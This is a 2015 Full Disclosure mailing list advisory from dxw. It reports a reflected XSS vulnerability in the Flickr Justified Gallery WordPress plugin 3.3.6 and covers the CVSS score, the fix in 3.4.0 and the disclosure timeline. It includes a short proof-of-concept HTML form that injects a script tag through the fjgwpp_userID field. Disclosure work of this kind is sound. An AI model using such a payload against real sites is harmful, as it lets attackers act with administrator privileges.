[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost a
From: dxw Security <security () dxw ! com>
Date: 2015-07-28 11:23:07
Message-ID: 3e30a2526cce08a66e0e4534e115a42a () security ! dxw ! com
[Download RAW message or body]
Details
================
Software: Flickr Justified Gallery
Version: 3.3.6
Homepage: https://wordpress.org/plugins/flickr-justified-gallery/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-flickr-justified-gallery-could-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost \
anything an admin can do
Vulnerability
================
This plugin contains a reflected XSS vulnerability which would allow an unauthenticated \
attacker to do almost anything an admin user can do. For this to happen, the administrator \
would have to be tricked into clicking on a link controlled by the attacker. It is easy to make \
these links very convincing.
Proof of concept
================
Visit a page containing the following in Firefox or any other browser with no reflected XSS \
mitigation strategies, and click submit: <form \
action=\"http://localhost/wp-admin/options-general.php?page=fjgwpp.php\" method=\"POST\"> \
<input type=\"text\" name=\"fjgwpp_userID\" value=\":"><script>alert(1)</script>\"> \
<input type=\"text\" name=\"Submit\" value=\"Save Changes\"> <input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 3.4.0 or later
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: \
https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third \
party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your \
behalf.
This vulnerability will be published if we do not receive a response to this report with 14 \
days.
Timeline
================
2015-07-21: Discovered
2015-07-22: Reported to vendor via email
2015-07-22: Requested CVE
2015-07-23: Vendor responded confirming fixed in 3.4.0
2015-07-28: Published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic